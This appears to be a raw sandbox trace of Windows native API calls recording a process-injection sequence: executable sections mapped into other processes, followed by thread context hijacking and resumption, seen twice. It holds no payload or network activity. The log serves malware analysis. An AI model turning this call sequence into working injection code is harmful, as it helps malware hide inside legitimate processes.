[354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0171.123] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0171.123] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x162200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x163000) returned 0x0 [0171.135] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x162200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0xc10000, SectionOffset=0x0, ViewSize=0xde6e8*=0x163000) returned 0x0 [0171.187] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0171.209] NtClose (Handle=0x140) returned 0x0 [0171.209] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x23d000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0xcdf707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0171.217] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0171.217] NtClose (Handle=0x138) returned 0x0 [0171.217] NtClose (Handle=0xb4) returned 0x0 [0171.219] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x103c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0171.219] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0171.219] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0171.219] NtReadVirtualMemory (in: ProcessHandle=0xb4, BaseAddress=0x334000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0171.220] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0171.228] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1040) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0171.228] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0171.229] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2010000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0171.248] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x334000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0171.254] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0171.255] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x198200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x199000) returned 0x0 [0171.271] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x198200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x29e0000, SectionOffset=0x0, ViewSize=0xde6e8*=0x199000) returned 0x0 [0171.419] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0171.438] NtClose (Handle=0x140) returned 0x0 [0171.454] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x334000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2ae5707, 